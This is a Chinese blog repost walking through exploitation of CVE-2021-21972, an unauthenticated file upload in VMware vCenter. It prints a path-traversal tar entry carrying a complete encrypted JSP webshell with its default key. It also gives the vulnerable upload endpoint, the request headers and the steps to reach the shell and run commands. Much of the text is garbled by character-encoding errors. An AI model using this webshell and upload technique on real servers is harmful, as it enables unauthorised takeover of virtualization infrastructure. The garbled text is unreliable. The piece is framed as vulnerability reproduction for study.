溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

如何實(shí)現(xiàn)Vmware vcenter未授權(quán)任意文件上傳CVE-2021-21972復(fù)現(xiàn)

發(fā)布時(shí)間:2021-12-29 17:39:58 來(lái)源:億速云 閱讀:247 作者:柒染 欄目:安全技術(shù)

本篇文章給大家分享的是有關(guān)如何實(shí)現(xiàn)Vmware vcenter未授權(quán)任意文件上傳CVE-2021-21972復(fù)現(xiàn),小編覺(jué)得挺實(shí)用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說(shuō),跟著小編一起來(lái)看看吧。

Vmware vcenter未授權(quán)任意文件上傳(CVE-2021-21972 )

一、漏洞簡(jiǎn)介

VMware是一家云基礎(chǔ)架構(gòu)和移動(dòng)商務(wù)解決方案廠商,提供基于VMware的虛擬化解決方案。

高危嚴(yán)重漏洞:

在 CVE-2021-21972 VMware vCenter Server 遠(yuǎn)程代碼漏洞 中,攻擊者可直接通過(guò)443端口構(gòu)造惡意請(qǐng)求,執(zhí)行任意代碼,控制vCenter。

漏洞為任意文件上傳:

存在問(wèn)題的接口為

/ui/vropspluginui/rest/services/uploadova,

完整路徑

(https://ip:port/ui/vropspluginui/rest/services/uploadova)

二、影響版本

VMware vCenter Server 7.0系列 < 7.0.U1c

VMware vCenter Server 6.7系列 < 6.7.U3l

VMware vCenter Server 6.5系列 < 6.5 U3n

VMware ESXi 7.0系列 < ESXi70U1c-17325551

VMware ESXi 6.7系列 < ESXi670-202102401-SG

VMware ESXi 6.5系列 < ESXi650-202102101-SG

三、環(huán)境準(zhǔn)備&漏洞復(fù)現(xiàn)

安裝EXSI 7.0.0  VMware vSphere虛擬機(jī)監(jiān)控程序(ESXi) 鏈接:https://cld16.irans3.com/dlir-s3/VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso檔案大小:350 MB MD5:220d2e87290f50c3508214cadf66b737 SHA1:7fda0401ee1b2f49aae89043f9b2d509cf7e25db 安裝:https://blog.51cto.com/10802692/2409826  下載 vCenter Server  VMware vCenter Server 鏈接:https://cld5.irans3.com/dlir-s3/VMware-VCSA-all-7.0.0-15952498.iso VMware-VCSA-all-7.0.0-15952498.iso檔案大?。?.42 GB MD5:94bb30ae83cd5f12e2eecce114d43007 SHA1:17aa2b1ee20e977fb4f8f8391563f57c3e456361 安裝:https://blog.csdn.net/qq_38028248/article/details/107712839 (環(huán)境安裝參考來(lái)源:作者: print("")師傅環(huán)境部署)

midi.tar(后臺(tái)回復(fù):"vmware")獲取

如何實(shí)現(xiàn)Vmware vcenter未授權(quán)任意文件上傳CVE-2021-21972復(fù)現(xiàn)

../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h6ngc.war/resources/0000755000000000000000000000000014015431210027145 5ustar rootroot../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h6ngc.war/resources/shell.jsp0000644000000000000000000000117114015430711030777 0ustar rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*該密鑰為連接密碼32位md5值的前16位,默認(rèn)連接密碼rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%>

https://ip:port/ui/vropspluginui/rest/services/uploadova

如何實(shí)現(xiàn)Vmware vcenter未授權(quán)任意文件上傳CVE-2021-21972復(fù)現(xiàn)

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36

如何實(shí)現(xiàn)Vmware vcenter未授權(quán)任意文件上傳CVE-2021-21972復(fù)現(xiàn)

如何實(shí)現(xiàn)Vmware vcenter未授權(quán)任意文件上傳CVE-2021-21972復(fù)現(xiàn)

返回sucess證明上傳tar成功

訪問(wèn)shell地址:

https://127.0.0.1/ui/resources/shell.jsp

如何實(shí)現(xiàn)Vmware vcenter未授權(quán)任意文件上傳CVE-2021-21972復(fù)現(xiàn)

連接木馬shell:

如何實(shí)現(xiàn)Vmware vcenter未授權(quán)任意文件上傳CVE-2021-21972復(fù)現(xiàn)

相關(guān)命令執(zhí)行:

如何實(shí)現(xiàn)Vmware vcenter未授權(quán)任意文件上傳CVE-2021-21972復(fù)現(xiàn)

以上就是如何實(shí)現(xiàn)Vmware vcenter未授權(quán)任意文件上傳CVE-2021-21972復(fù)現(xiàn),小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘9ぷ鲿?huì)見到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注億速云行業(yè)資訊頻道。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI